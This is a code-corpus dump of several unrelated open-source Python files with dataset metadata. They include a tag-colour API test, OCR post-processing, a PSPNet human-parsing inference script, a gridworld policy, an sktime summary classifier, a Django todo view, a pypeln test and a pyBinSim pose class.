data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| en | 0.77976 | # -*- coding: utf-8 -*- # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. | 2.04193 | 2 |
pytorchocr/postprocess/cls_postprocess.py | satchelwu/PaddleOCR2Pytorch | 3 | 9105 | import torch
class ClsPostProcess(object):
""" Convert between text-label and text-index """
def __init__(self, label_list, **kwargs):
super(ClsPostProcess, self).__init__()
self.label_list = label_list
def __call__(self, preds, label=None, *args, **kwargs):
if isinstance(preds, torch.Tensor):
preds = preds.numpy()
pred_idxs = preds.argmax(axis=1)
decode_out = [(self.label_list[idx], preds[i, idx])
for i, idx in enumerate(pred_idxs)]
if label is None:
return decode_out
label = [(self.label_list[idx], 1.0) for idx in label]
return decode_out, label | import torch
class ClsPostProcess(object):
""" Convert between text-label and text-index """
def __init__(self, label_list, **kwargs):
super(ClsPostProcess, self).__init__()
self.label_list = label_list
def __call__(self, preds, label=None, *args, **kwargs):
if isinstance(preds, torch.Tensor):
preds = preds.numpy()
pred_idxs = preds.argmax(axis=1)
decode_out = [(self.label_list[idx], preds[i, idx])
for i, idx in enumerate(pred_idxs)]
if label is None:
return decode_out
label = [(self.label_list[idx], 1.0) for idx in label]
return decode_out, label | en | 0.769787 | Convert between text-label and text-index | 2.599187 | 3 |
inference_folder.py | aba-ai-learning/Single-Human-Parsing-LIP | 0 | 9106 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
import argparse
import logging
import numpy as np
from PIL import Image
import matplotlib
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torchvision import transforms
import cv2
import tqdm
from net.pspnet import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet'),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet'),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18'),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34'),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50'),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101'),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152')
}
parser = argparse.ArgumentParser(description="Pyramid Scene Parsing Network")
parser.add_argument('--models-path', type=str, default='./checkpoints',
help='Path for storing model snapshots')
parser.add_argument('--backend', type=str,
default='densenet', help='Feature extractor')
parser.add_argument('--num-classes', type=int,
default=20, help="Number of classes.")
args = parser.parse_args()
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
if not epoch == 'last':
epoch = int(epoch)
net.load_state_dict(torch.load(
snapshot, map_location=torch.device('cpu')))
logging.info(
"Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
if torch.cuda.is_available():
net = net.cuda()
return net, epoch
def get_transform():
transform_image_list = [
# transforms.Resize((192, 256), 3),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
return transforms.Compose(transform_image_list)
def show_image(img, pred):
fig, axes = plt.subplots(1, 2)
ax0, ax1 = axes
ax0.get_xaxis().set_ticks([])
ax0.get_yaxis().set_ticks([])
ax1.get_xaxis().set_ticks([])
ax1.get_yaxis().set_ticks([])
classes = np.array(('Background', # always index 0
'Hat', 'Hair', 'Glove', 'Sunglasses',
'UpperClothes', 'Dress', 'Coat', 'Socks',
'Pants', 'Jumpsuits', 'Scarf', 'Skirt',
'Face', 'Left-arm', 'Right-arm', 'Left-leg',
'Right-leg', 'Left-shoe', 'Right-shoe',))
colormap = [(0, 0, 0),
(1, 0.25, 0), (0, 0.25, 0), (0.5, 0, 0.25), (1, 1, 1),
(1, 0.75, 0), (0, 0, 0.5), (0.5, 0.25, 0), (0.75, 0, 0.25),
(1, 0, 0.25), (0, 0.5, 0), (0.5, 0.5, 0), (0.25, 0, 0.5),
(1, 0, 0.75), (0, 0.5, 0.5), (0.25, 0.5, 0.5), (1, 0, 0),
(1, 0.25, 0), (0, 0.75, 0), (0.5, 0.75, 0), ]
cmap = matplotlib.colors.ListedColormap(colormap)
bounds = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
h, w, _ = pred.shape
def denormalize(img, mean, std):
c, _, _ = img.shape
for idx in range(c):
img[idx, :, :] = img[idx, :, :] * std[idx] + mean[idx]
return img
img = denormalize(img.cpu().numpy(), [0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])
img = img.transpose(1, 2, 0).reshape((h, w, 3))
pred = pred.reshape((h, w))
# show image
ax0.set_title('img')
ax0.imshow(img)
ax1.set_title('pred')
mappable = ax1.imshow(pred, cmap=cmap, norm=norm)
# colorbar legend
cbar = plt.colorbar(mappable, ax=axes, shrink=0.7, )
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(classes):
cbar.ax.text(2.3, (j + 0.45) / 20.0, lab, ha='left', va='center', )
plt.savefig(fname="./result.jpg")
print('result saved to ./result.jpg')
plt.show()
def main():
# --------------- model --------------- #
snapshot = os.path.join(args.models_path, args.backend, 'PSPNet_last')
net, starting_epoch = build_network(snapshot, args.backend)
net.eval()
# ------------ load image ------------ #
data_transform = get_transform()
imgfolder = 'ACGPN/ACGPN_testdata/test_img/'
savefolder = 'ACGPN/ACGPN_testdata/test_humanparse/'
if not os.path.exists(savefolder):
os.mkdir(savefolder)
imglist = os.listdir(imgfolder)
for imgname in tqdm.tqdm(imglist):
imgpath = os.path.join(imgfolder, imgname)
print(imgpath)
img = Image.open(imgpath)
img = data_transform(img)
if torch.cuda.is_available():
img = img.cuda()
with torch.no_grad():
pred, _ = net(img.unsqueeze(dim=0))
pred = pred.squeeze(dim=0)
pred = pred.cpu().numpy().transpose(1, 2, 0)
pred = np.asarray(np.argmax(pred, axis=2),
dtype=np.uint8).reshape((256, 192, 1))
pred_3 = np.repeat(pred, 3, axis = 2)
savepath = os.path.join(savefolder, imgname)
cv2.imwrite(savepath, pred_3)
if __name__ == '__main__':
main()
| #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
import argparse
import logging
import numpy as np
from PIL import Image
import matplotlib
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torchvision import transforms
import cv2
import tqdm
from net.pspnet import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet'),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet'),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18'),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34'),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50'),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101'),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152')
}
parser = argparse.ArgumentParser(description="Pyramid Scene Parsing Network")
parser.add_argument('--models-path', type=str, default='./checkpoints',
help='Path for storing model snapshots')
parser.add_argument('--backend', type=str,
default='densenet', help='Feature extractor')
parser.add_argument('--num-classes', type=int,
default=20, help="Number of classes.")
args = parser.parse_args()
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
if not epoch == 'last':
epoch = int(epoch)
net.load_state_dict(torch.load(
snapshot, map_location=torch.device('cpu')))
logging.info(
"Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
if torch.cuda.is_available():
net = net.cuda()
return net, epoch
def get_transform():
transform_image_list = [
# transforms.Resize((192, 256), 3),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
return transforms.Compose(transform_image_list)
def show_image(img, pred):
fig, axes = plt.subplots(1, 2)
ax0, ax1 = axes
ax0.get_xaxis().set_ticks([])
ax0.get_yaxis().set_ticks([])
ax1.get_xaxis().set_ticks([])
ax1.get_yaxis().set_ticks([])
classes = np.array(('Background', # always index 0
'Hat', 'Hair', 'Glove', 'Sunglasses',
'UpperClothes', 'Dress', 'Coat', 'Socks',
'Pants', 'Jumpsuits', 'Scarf', 'Skirt',
'Face', 'Left-arm', 'Right-arm', 'Left-leg',
'Right-leg', 'Left-shoe', 'Right-shoe',))
colormap = [(0, 0, 0),
(1, 0.25, 0), (0, 0.25, 0), (0.5, 0, 0.25), (1, 1, 1),
(1, 0.75, 0), (0, 0, 0.5), (0.5, 0.25, 0), (0.75, 0, 0.25),
(1, 0, 0.25), (0, 0.5, 0), (0.5, 0.5, 0), (0.25, 0, 0.5),
(1, 0, 0.75), (0, 0.5, 0.5), (0.25, 0.5, 0.5), (1, 0, 0),
(1, 0.25, 0), (0, 0.75, 0), (0.5, 0.75, 0), ]
cmap = matplotlib.colors.ListedColormap(colormap)
bounds = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
h, w, _ = pred.shape
def denormalize(img, mean, std):
c, _, _ = img.shape
for idx in range(c):
img[idx, :, :] = img[idx, :, :] * std[idx] + mean[idx]
return img
img = denormalize(img.cpu().numpy(), [0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])
img = img.transpose(1, 2, 0).reshape((h, w, 3))
pred = pred.reshape((h, w))
# show image
ax0.set_title('img')
ax0.imshow(img)
ax1.set_title('pred')
mappable = ax1.imshow(pred, cmap=cmap, norm=norm)
# colorbar legend
cbar = plt.colorbar(mappable, ax=axes, shrink=0.7, )
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(classes):
cbar.ax.text(2.3, (j + 0.45) / 20.0, lab, ha='left', va='center', )
plt.savefig(fname="./result.jpg")
print('result saved to ./result.jpg')
plt.show()
def main():
# --------------- model --------------- #
snapshot = os.path.join(args.models_path, args.backend, 'PSPNet_last')
net, starting_epoch = build_network(snapshot, args.backend)
net.eval()
# ------------ load image ------------ #
data_transform = get_transform()
imgfolder = 'ACGPN/ACGPN_testdata/test_img/'
savefolder = 'ACGPN/ACGPN_testdata/test_humanparse/'
if not os.path.exists(savefolder):
os.mkdir(savefolder)
imglist = os.listdir(imgfolder)
for imgname in tqdm.tqdm(imglist):
imgpath = os.path.join(imgfolder, imgname)
print(imgpath)
img = Image.open(imgpath)
img = data_transform(img)
if torch.cuda.is_available():
img = img.cuda()
with torch.no_grad():
pred, _ = net(img.unsqueeze(dim=0))
pred = pred.squeeze(dim=0)
pred = pred.cpu().numpy().transpose(1, 2, 0)
pred = np.asarray(np.argmax(pred, axis=2),
dtype=np.uint8).reshape((256, 192, 1))
pred_3 = np.repeat(pred, 3, axis = 2)
savepath = os.path.join(savefolder, imgname)
cv2.imwrite(savepath, pred_3)
if __name__ == '__main__':
main()
| en | 0.413267 | #!/usr/local/bin/python3 # -*- coding: utf-8 -*- # transforms.Resize((192, 256), 3), # always index 0 # show image # colorbar legend # --------------- model --------------- # # ------------ load image ------------ # | 2.073383 | 2 |
src/random_policy.py | shuvoxcd01/Policy-Evaluation | 0 | 9107 | from src.gridworld_mdp import GridWorld
class EquiprobableRandomPolicy:
def __init__(self):
self.world_model = GridWorld()
def get_prob(self, selected_action, state):
assert state in self.world_model.states
assert selected_action in self.world_model.actions
num_all_possible_actions = 0
times_selected_action_chosen = 0
for next_state in self.world_model.states:
for action in self.world_model.actions:
if self.world_model.reward_fn(state, action, next_state) == -1:
num_all_possible_actions += 1
if action == selected_action:
times_selected_action_chosen += 1
if not num_all_possible_actions:
return 0
prob = times_selected_action_chosen / num_all_possible_actions
return prob
| from src.gridworld_mdp import GridWorld
class EquiprobableRandomPolicy:
def __init__(self):
self.world_model = GridWorld()
def get_prob(self, selected_action, state):
assert state in self.world_model.states
assert selected_action in self.world_model.actions
num_all_possible_actions = 0
times_selected_action_chosen = 0
for next_state in self.world_model.states:
for action in self.world_model.actions:
if self.world_model.reward_fn(state, action, next_state) == -1:
num_all_possible_actions += 1
if action == selected_action:
times_selected_action_chosen += 1
if not num_all_possible_actions:
return 0
prob = times_selected_action_chosen / num_all_possible_actions
return prob
| none | 1 | 2.727045 | 3 |
|
sktime/classification/feature_based/_summary_classifier.py | Rubiel1/sktime | 1 | 9108 | <filename>sktime/classification/feature_based/_summary_classifier.py
# -*- coding: utf-8 -*-
"""Summary Classifier.
Pipeline classifier using the basic summary statistics and an estimator.
"""
__author__ = ["MatthewMiddlehurst"]
__all__ = ["SummaryClassifier"]
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sktime.base._base import _clone_estimator
from sktime.classification.base import BaseClassifier
from sktime.transformations.series.summarize import SummaryTransformer
class SummaryClassifier(BaseClassifier):
"""Summary statistic classifier.
This classifier simply transforms the input data using the SummaryTransformer
transformer and builds a provided estimator using the transformed data.
Parameters
----------
summary_functions : str, list, tuple, default=("mean", "std", "min", "max")
Either a string, or list or tuple of strings indicating the pandas
summary functions that are used to summarize each column of the dataset.
Must be one of ("mean", "min", "max", "median", "sum", "skew", "kurt",
"var", "std", "mad", "sem", "nunique", "count").
summary_quantiles : str, list, tuple or None, default=(0.25, 0.5, 0.75)
Optional list of series quantiles to calculate. If None, no quantiles
are calculated.
estimator : sklearn classifier, default=None
An sklearn estimator to be built using the transformed data. Defaults to a
Random Forest with 200 trees.
n_jobs : int, default=1
The number of jobs to run in parallel for both `fit` and `predict`.
``-1`` means using all processors.
random_state : int or None, default=None
Seed for random, integer.
Attributes
----------
n_classes_ : int
Number of classes. Extracted from the data.
classes_ : ndarray of shape (n_classes)
Holds the label for each class.
See Also
--------
SummaryTransformer
Examples
--------
>>> from sktime.classification.feature_based import SummaryClassifier
>>> from sklearn.ensemble import RandomForestClassifier
>>> from sktime.datasets import load_unit_test
>>> X_train, y_train = load_unit_test(split="train", return_X_y=True)
>>> X_test, y_test = load_unit_test(split="test", return_X_y=True)
>>> clf = SummaryClassifier(estimator=RandomForestClassifier(n_estimators=10))
>>> clf.fit(X_train, y_train)
SummaryClassifier(...)
>>> y_pred = clf.predict(X_test)
"""
_tags = {
"capability:multivariate": True,
"capability:multithreading": True,
}
def __init__(
self,
summary_functions=("mean", "std", "min", "max"),
summary_quantiles=(0.25, 0.5, 0.75),
estimator=None,
n_jobs=1,
random_state=None,
):
self.summary_functions = summary_functions
self.summary_quantiles = summary_quantiles
self.estimator = estimator
self.n_jobs = n_jobs
self.random_state = random_state
self._transformer = None
self._estimator = None
self._transform_atts = 0
super(SummaryClassifier, self).__init__()
def _fit(self, X, y):
"""Fit a pipeline on cases (X,y), where y is the target variable.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The training data.
y : array-like, shape = [n_instances]
The class labels.
Returns
-------
self :
Reference to self.
Notes
-----
Changes state by creating a fitted model that updates attributes
ending in "_" and sets is_fitted flag to True.
"""
self._transformer = SummaryTransformer(
summary_function=self.summary_functions,
quantiles=self.summary_quantiles,
)
self._estimator = _clone_estimator(
RandomForestClassifier(n_estimators=200)
if self.estimator is None
else self.estimator,
self.random_state,
)
m = getattr(self._estimator, "n_jobs", None)
if m is not None:
self._estimator.n_jobs = self._threads_to_use
X_t = self._transformer.fit_transform(X, y)
if X_t.shape[0] > len(y):
X_t = X_t.to_numpy().reshape((len(y), -1))
self._transform_atts = X_t.shape[1]
self._estimator.fit(X_t, y)
return self
def _predict(self, X):
"""Predict class values of n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predictions for.
Returns
-------
y : array-like, shape = [n_instances]
Predicted class labels.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
return self._estimator.predict(X_t)
def _predict_proba(self, X):
"""Predict class probabilities for n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predict probabilities for.
Returns
-------
y : array-like, shape = [n_instances, n_classes_]
Predicted probabilities using the ordering in classes_.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
m = getattr(self._estimator, "predict_proba", None)
if callable(m):
return self._estimator.predict_proba(X_t)
else:
dists = np.zeros((X.shape[0], self.n_classes_))
preds = self._estimator.predict(X_t)
for i in range(0, X.shape[0]):
dists[i, self._class_dictionary[preds[i]]] = 1
return dists
| <filename>sktime/classification/feature_based/_summary_classifier.py
# -*- coding: utf-8 -*-
"""Summary Classifier.
Pipeline classifier using the basic summary statistics and an estimator.
"""
__author__ = ["MatthewMiddlehurst"]
__all__ = ["SummaryClassifier"]
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sktime.base._base import _clone_estimator
from sktime.classification.base import BaseClassifier
from sktime.transformations.series.summarize import SummaryTransformer
class SummaryClassifier(BaseClassifier):
"""Summary statistic classifier.
This classifier simply transforms the input data using the SummaryTransformer
transformer and builds a provided estimator using the transformed data.
Parameters
----------
summary_functions : str, list, tuple, default=("mean", "std", "min", "max")
Either a string, or list or tuple of strings indicating the pandas
summary functions that are used to summarize each column of the dataset.
Must be one of ("mean", "min", "max", "median", "sum", "skew", "kurt",
"var", "std", "mad", "sem", "nunique", "count").
summary_quantiles : str, list, tuple or None, default=(0.25, 0.5, 0.75)
Optional list of series quantiles to calculate. If None, no quantiles
are calculated.
estimator : sklearn classifier, default=None
An sklearn estimator to be built using the transformed data. Defaults to a
Random Forest with 200 trees.
n_jobs : int, default=1
The number of jobs to run in parallel for both `fit` and `predict`.
``-1`` means using all processors.
random_state : int or None, default=None
Seed for random, integer.
Attributes
----------
n_classes_ : int
Number of classes. Extracted from the data.
classes_ : ndarray of shape (n_classes)
Holds the label for each class.
See Also
--------
SummaryTransformer
Examples
--------
>>> from sktime.classification.feature_based import SummaryClassifier
>>> from sklearn.ensemble import RandomForestClassifier
>>> from sktime.datasets import load_unit_test
>>> X_train, y_train = load_unit_test(split="train", return_X_y=True)
>>> X_test, y_test = load_unit_test(split="test", return_X_y=True)
>>> clf = SummaryClassifier(estimator=RandomForestClassifier(n_estimators=10))
>>> clf.fit(X_train, y_train)
SummaryClassifier(...)
>>> y_pred = clf.predict(X_test)
"""
_tags = {
"capability:multivariate": True,
"capability:multithreading": True,
}
def __init__(
self,
summary_functions=("mean", "std", "min", "max"),
summary_quantiles=(0.25, 0.5, 0.75),
estimator=None,
n_jobs=1,
random_state=None,
):
self.summary_functions = summary_functions
self.summary_quantiles = summary_quantiles
self.estimator = estimator
self.n_jobs = n_jobs
self.random_state = random_state
self._transformer = None
self._estimator = None
self._transform_atts = 0
super(SummaryClassifier, self).__init__()
def _fit(self, X, y):
"""Fit a pipeline on cases (X,y), where y is the target variable.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The training data.
y : array-like, shape = [n_instances]
The class labels.
Returns
-------
self :
Reference to self.
Notes
-----
Changes state by creating a fitted model that updates attributes
ending in "_" and sets is_fitted flag to True.
"""
self._transformer = SummaryTransformer(
summary_function=self.summary_functions,
quantiles=self.summary_quantiles,
)
self._estimator = _clone_estimator(
RandomForestClassifier(n_estimators=200)
if self.estimator is None
else self.estimator,
self.random_state,
)
m = getattr(self._estimator, "n_jobs", None)
if m is not None:
self._estimator.n_jobs = self._threads_to_use
X_t = self._transformer.fit_transform(X, y)
if X_t.shape[0] > len(y):
X_t = X_t.to_numpy().reshape((len(y), -1))
self._transform_atts = X_t.shape[1]
self._estimator.fit(X_t, y)
return self
def _predict(self, X):
"""Predict class values of n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predictions for.
Returns
-------
y : array-like, shape = [n_instances]
Predicted class labels.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
return self._estimator.predict(X_t)
def _predict_proba(self, X):
"""Predict class probabilities for n instances in X.
Parameters
----------
X : 3D np.array of shape = [n_instances, n_dimensions, series_length]
The data to make predict probabilities for.
Returns
-------
y : array-like, shape = [n_instances, n_classes_]
Predicted probabilities using the ordering in classes_.
"""
X_t = self._transformer.transform(X)
if X_t.shape[1] < self._transform_atts:
X_t = X_t.to_numpy().reshape((-1, self._transform_atts))
m = getattr(self._estimator, "predict_proba", None)
if callable(m):
return self._estimator.predict_proba(X_t)
else:
dists = np.zeros((X.shape[0], self.n_classes_))
preds = self._estimator.predict(X_t)
for i in range(0, X.shape[0]):
dists[i, self._class_dictionary[preds[i]]] = 1
return dists
| en | 0.595299 | # -*- coding: utf-8 -*- Summary Classifier. Pipeline classifier using the basic summary statistics and an estimator. Summary statistic classifier. This classifier simply transforms the input data using the SummaryTransformer transformer and builds a provided estimator using the transformed data. Parameters ---------- summary_functions : str, list, tuple, default=("mean", "std", "min", "max") Either a string, or list or tuple of strings indicating the pandas summary functions that are used to summarize each column of the dataset. Must be one of ("mean", "min", "max", "median", "sum", "skew", "kurt", "var", "std", "mad", "sem", "nunique", "count"). summary_quantiles : str, list, tuple or None, default=(0.25, 0.5, 0.75) Optional list of series quantiles to calculate. If None, no quantiles are calculated. estimator : sklearn classifier, default=None An sklearn estimator to be built using the transformed data. Defaults to a Random Forest with 200 trees. n_jobs : int, default=1 The number of jobs to run in parallel for both `fit` and `predict`. ``-1`` means using all processors. random_state : int or None, default=None Seed for random, integer. Attributes ---------- n_classes_ : int Number of classes. Extracted from the data. classes_ : ndarray of shape (n_classes) Holds the label for each class. See Also -------- SummaryTransformer Examples -------- >>> from sktime.classification.feature_based import SummaryClassifier >>> from sklearn.ensemble import RandomForestClassifier >>> from sktime.datasets import load_unit_test >>> X_train, y_train = load_unit_test(split="train", return_X_y=True) >>> X_test, y_test = load_unit_test(split="test", return_X_y=True) >>> clf = SummaryClassifier(estimator=RandomForestClassifier(n_estimators=10)) >>> clf.fit(X_train, y_train) SummaryClassifier(...) >>> y_pred = clf.predict(X_test) Fit a pipeline on cases (X,y), where y is the target variable. Parameters ---------- X : 3D np.array of shape = [n_instances, n_dimensions, series_length] The training data. y : array-like, shape = [n_instances] The class labels. Returns ------- self : Reference to self. Notes ----- Changes state by creating a fitted model that updates attributes ending in "_" and sets is_fitted flag to True. Predict class values of n instances in X. Parameters ---------- X : 3D np.array of shape = [n_instances, n_dimensions, series_length] The data to make predictions for. Returns ------- y : array-like, shape = [n_instances] Predicted class labels. Predict class probabilities for n instances in X. Parameters ---------- X : 3D np.array of shape = [n_instances, n_dimensions, series_length] The data to make predict probabilities for. Returns ------- y : array-like, shape = [n_instances, n_classes_] Predicted probabilities using the ordering in classes_. | 3.14307 | 3 |
coding/reverse_bits/starter.py | skumaravelan/tech-interview-questions | 14 | 9109 | class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
| class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
| en | 0.106937 | # @param n, an integer # @return an integer | 2.786227 | 3 |
Topics/Submitting data/POST Request With Several Keys/main.py | valenciarichards/hypernews-portal | 1 | 9110 | <reponame>valenciarichards/hypernews-portal
from django.shortcuts import redirect
from django.views import View
class TodoView(View):
all_todos = []
def post(self, request, *args, **kwargs):
todo = request.POST.get("todo")
important = request.POST.get("important")
if todo not in self.all_todos:
if important:
self.all_todos = [todo] + self.all_todos
else:
self.all_todos.append(todo)
return redirect("/")
| from django.shortcuts import redirect
from django.views import View
class TodoView(View):
all_todos = []
def post(self, request, *args, **kwargs):
todo = request.POST.get("todo")
important = request.POST.get("important")
if todo not in self.all_todos:
if important:
self.all_todos = [todo] + self.all_todos
else:
self.all_todos.append(todo)
return redirect("/") | none | 1 | 2.190704 | 2 |
|
pypeln/thread/api/to_iterable_thread_test.py | quarckster/pypeln | 1,281 | 9111 | <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
| <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
| none | 1 | 2.5772 | 3 |
|
pybinsim/pose.py | fkleinTUI/pyBinSim | 0 | 9112 | import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
| import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
| en | 0.275541 | # 'old' format: orientation - position # 'new' format: orientation - position - custom | 2.798831 | 3 |
